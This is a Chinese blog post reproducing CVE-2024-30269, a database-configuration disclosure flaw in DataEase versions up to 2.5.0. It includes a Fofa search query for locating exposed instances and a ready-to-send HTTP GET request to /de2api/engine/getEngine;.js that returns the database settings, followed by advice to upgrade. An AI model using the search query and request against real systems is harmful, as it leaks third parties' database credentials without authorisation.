DataEase 数据库配置信息泄露(CVE-2024-30269)

于 2024-09-27 13:56:35 发布
阅读量216 收藏
点赞数 8
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/142591714
版权

0x01 产品描述:

        DataEase(github.com/dataease)是一款开源的数据可视化分析工具,可以帮助用户快速分析业务数据并洞察其趋势,为企业的业务改进与优化提供支持。

0x02 漏洞描述:

      DataEase在版本2.5.0之前存在数据库配置信息暴露漏洞。通过浏览器访问/de2api/engine/getEngine;.js路径可以获取平台的数据库配置。该漏洞已在v2.5.0中修复,除了升级之外,没有已知的解决方法。

0x03 影响版本:

DataEase <= 2.5.0版本

0x04 搜索语句:

Fofa:body="Dataease"

0x05 漏洞复现:

GET /de2api/engine/getEngine;.js HTTP/1.1
Content-Type: application/json
Host: your-ip

 

0x06 修复建议:

厂商已发布补丁,请更新至最新版

iSee857
关注
专栏目录
DataEase演示数据库
07-12
DataEase演示数据库是一个专为展示和测试DataEase功能而设计的数据库实例。DataEase是一款开源的数据可视化和自助式分析工具,旨在帮助用户轻松地连接、探索和分享数据洞察。通过这个数据库,用户可以快速了解...
DataEase-dev-v2.zip
05-27
DataEase 是开源的数据可视化分析工具,帮助用户快速分析数据并洞察业务趋势,从而实现业务的改进与优化。DataEase 支持丰富的数据源连接,能够通过拖拉拽方式快速制作图表,并可以方便地与他人分享。
DataEase SQL注入漏洞 (CVE-2022-34114)
weixin_68999845的博客
07-21 1043
CVE-2022-34114漏洞搭建及复现
【漏洞复现】DataEase数据可视化分析工具SQL注入-CVE-2023-40771
TT小子的博客
09-07 37
1、DataEase数据可视化分析工具简介 DataEase 是开源的数据可视化分析工具,帮助用户快速分析数据并洞察业务趋势,从而实现业务的改进与优化。DataEase 支持丰富的数据源连接,能够通过拖拉拽方式快速制作图表,并可以方便与他人分享。 前端:Vue.js、Element 图库:Apache ECharts、AntV 后端:Spring Boot 中间件:MySQL 数据处理:Kett...
DataEase 数据源插件分享 - 时序数据库 InfluxDB
DoWhatYouSay的博客
05-05 1834
InfluxDB 是一个时序数据库,使用的是非标准的 SQL 语法,我使用 DataEase 的插件扩展机制开发了此数据源插件,在这里共享出来,想用的朋友可以下载安装使用。
记录2-4 dataease连接SQLServer 数据库需要注意的点
m0_59858141的博客
07-12 594
2)需要打开SQLserver中的配置管理器检查SQl Server(MSS...)是否启动。3)检查SQLserver的网络配置的...协议中的TCP/IP是否启用。2、需要数据库的名称以及它的用户名和登录密码。1、需要获取连接数据库的那台机器的网址。1)那台电脑需要关闭防火墙。
DataEase二开记录--踩坑和详细步骤(一)
weixin_45399602的博客
03-14 9651
最近在看DataEase,发现挺好用的,推荐使用。用的过程中萌生了二开的想法,于是自己玩了玩,并做了一些记录。
【数据仓库】Windows源码安装DataEaseDataEase二次开发
wenchun001的博客
07-12 4628
【数据仓库】Windows源码安装DataEaseDataEase二次开发
BI工具-DataEase(1) 安装
daqu1314的博客
10-17 597
4. 登录页面:默认的账户密码: admin/ dataease。使用的版本是 1.18.11。访问:your ip:80。1. 配置完成jdk环境。
DataEase二开记录--踩坑和详细步骤(二)
weixin_45399602的博客
03-14 4678
最近在看DataEase,发现挺好用的,推荐使用。 用的过程中萌生了二开的想法,于是自己玩了玩,并做了一些记录。
反序列化漏洞
weixin_68681298的博客
07-22 158
类就是一个共享相同结构和行为的对象的集合。 对象就是类的实例 调用对象的方法 魔术方法 php手册:PHP: 魔术方法 - Manual调用方法的示例 为什么设计魔术函数更加方便,比如需要在创建时做一些什么事情,销毁时做什么事情等等序列化:serialize反序列化:unserialize序列化代码示意 序列化数据类型格式除了有serialize方法可以序列化,还有一些别的方式也可以进行序列化示例: 在敏感信息不想被返回时,可以使用_sleep重写,重新定义返回值例子: 反序列化 反序列化的将序列化的值还原
DataEase数据可视化分析工具 v1.18.10.zip
10-03
1. 数据源连接:DataEase支持多种数据源的连接,包括但不限于数据库(如MySQL、PostgreSQL、Oracle等)、API接口、文件(CSV、Excel、JSON等)以及大数据平台(如Hadoop、Spark、Elasticsearch等)。这使得用户可以...
DataEase 是开源的数据可视化分析工具
04-21
1. 数据源集成:DataEase 支持多种类型的数据源接入,包括关系型数据库(如 MySQL、PostgreSQL)、NoSQL 数据库(如 MongoDB)、大数据平台(如 Hadoop、Spark)、API 接口以及文件系统等,能够轻松处理各种复杂的...
CVE-2024-1112 Resource Hacker 缓冲区溢出分析
信息安全
09-23 864
CVE-2024-1112 是 Resource Hacker 软件的一个缓冲区溢出漏洞。该漏洞存在于版本 3.6.0.92 中。由于软件在处理命令行中的文件路径时未对文件字符串长度进行限制,过长的字符串参数导致内存被过度写入,从而引发缓冲区溢出。
网络安全证书考取相关知识
aa98865646的博客
09-21 675
作者是个想进入网络安全行业发展的小白,目前没啥钱,是想自学以后挖漏洞赚钱的,看了这两个算是比较常见的证书看起来都要花不少钱的话,我感觉自己还是先自学一段时间再说吧,实战更重要,这些证书等以后有机会慢慢考吧,如果需要的话。欢迎大佬补充其他适合小白考取的证书,目前感觉4800+480的NISP一级证书比较适合在学校的小白,CISP的话再NISP考到二级以后再加钱4000就可以换成CISP了,NISP适合学生,CISP适合职场啊,不过都是要钱啊。
网络安全详解
weidl001的博客
09-21 1430
网络安全(Cybersecurity)是指保护网络系统、设备、程序及数据免受攻击、损坏或未授权访问的实践。其核心目标是确保信息的机密性、完整性和可用性。机密性(Confidentiality):确保信息仅被授权的人员访问。完整性(Integrity):保护信息不被未授权的修改或破坏。可用性(Availability):确保信息和资源在需要时可被访问和使用。
数据包签名校验的Web安全测试实践
INSBUG的博客
09-23 948
客户端和服务端使用相同的算法生成sign,服务端接收到请求后,先计算一次sign,如果业务参数、时间戳、其他参数中有一个被修改过,得到的sign与客户端发送的sign就会不一致,签名校验就会失败,服务端便不再处理请求。在金融类的Web安全测试中,经常可以见到Web请求和响应数据包加密和签名保护,由于参数不可见,不能重放请求包,这类应用通常不能直接进行有效的安全测试,爬虫也爬不到数据。点击“参数明文”控件,获取到了解密后的完整请求包,对明文参数进行安全测试,重放后插件会自动完成密文构造。
国产操作系统(统信UOS)网络安全等级保护基础安全加固
最新发布
2401_84434570的博客
09-26 572
统一操作系统UOS是由多家企业共同打造的中文国产操作系统。一、设置口令复杂度策略和有效期首先安装libpam-pwquality依赖包口令复杂度策略通过libpam-pwquality依赖包进行设置依赖包的安装命令:sudo apt-get install libpam-pwquality。依赖包的查看方式执行命令:dpkg -l libpam-pwquality。执行命令:vim etc/pam.d/common-passwd。
Dataease数据库数据集和sql数据集区别
04-05
DataEase数据库数据集和SQL数据集都是用于存储和管理数据的工具,但它们有一些区别。 1. 数据存储方式不同: DataEase数据库数据集是基于文件的数据库,而SQL数据库数据集是基于关系模型的数据库。 2. 数据库管理方式不同: DataEase数据库数据集使用可视化工具来管理数据库,而SQL数据库数据集需要通过编写SQL语句来管理数据库。 3. 数据查询方式不同: DataEase数据库数据集提供了基于表格的查询工具,而SQL数据库数据集可以通过编写复杂的SQL查询语句来查询数据。 4. 数据处理方式不同: DataEase数据库数据集提供了一些内置的数据处理工具,如计算字段和自动编号字段,而SQL数据库数据集需要通过编写SQL语句来处理数据。 5. 数据库应用范围不同: DataEase数据库数据集适用于中小型企业和个人用户,而SQL数据库数据集适用于大型企业和组织。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

iSee857

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值